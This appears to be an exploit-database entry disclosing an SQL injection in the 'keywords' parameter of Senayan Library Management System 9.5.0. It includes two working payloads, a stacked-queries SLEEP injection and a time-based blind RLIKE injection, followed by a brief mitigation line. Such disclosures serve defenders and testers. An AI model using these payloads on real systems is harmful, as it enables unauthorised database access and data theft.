header-logo
Suggest Exploit
vendor:
SLIMS
by:
nu11secur1ty
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: SLIMS
Affected Version From: 9.5.2000
Affected Version To: 9.5.2000
Patch Exists:
Related CWE:
CPE: a:slims.web.id:slims:9.5.0
Metasploit:
Other Scripts:
Platforms Tested:
2022

Senayan Library Management System v9.5.0 – SQL Injection

The `keywords` parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the keywords parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. The injection is confirmed manually from nu11secur1ty. The attacker can retrieve all information from the database of this system, by using this vulnerability.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
Source

Exploit-DB raw data:

## Title: Senayan Library Management System v9.5.0 - SQL Injection 
## Author: nu11secur1ty
## Date: 11.03.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0

## Description:
The `keywords` parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the keywords parameter, and a general
error message was returned.
Two single quotes were then submitted and the error message
disappeared. The injection is confirmed manually from nu11secur1ty.
The attacker can retrieve all information from the database of this
system, by using this vulnerability.

## STATUS: HIGH Vulnerability

[+] Payload:

```MySQL
---
Parameter: keywords (GET)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT
SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)
    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))
RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0)

## Proof and Exploit:
[href](https://streamable.com/63og5v)

## Time spent
`3:00`

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Navigation

Suggest Exploit

Services By CQR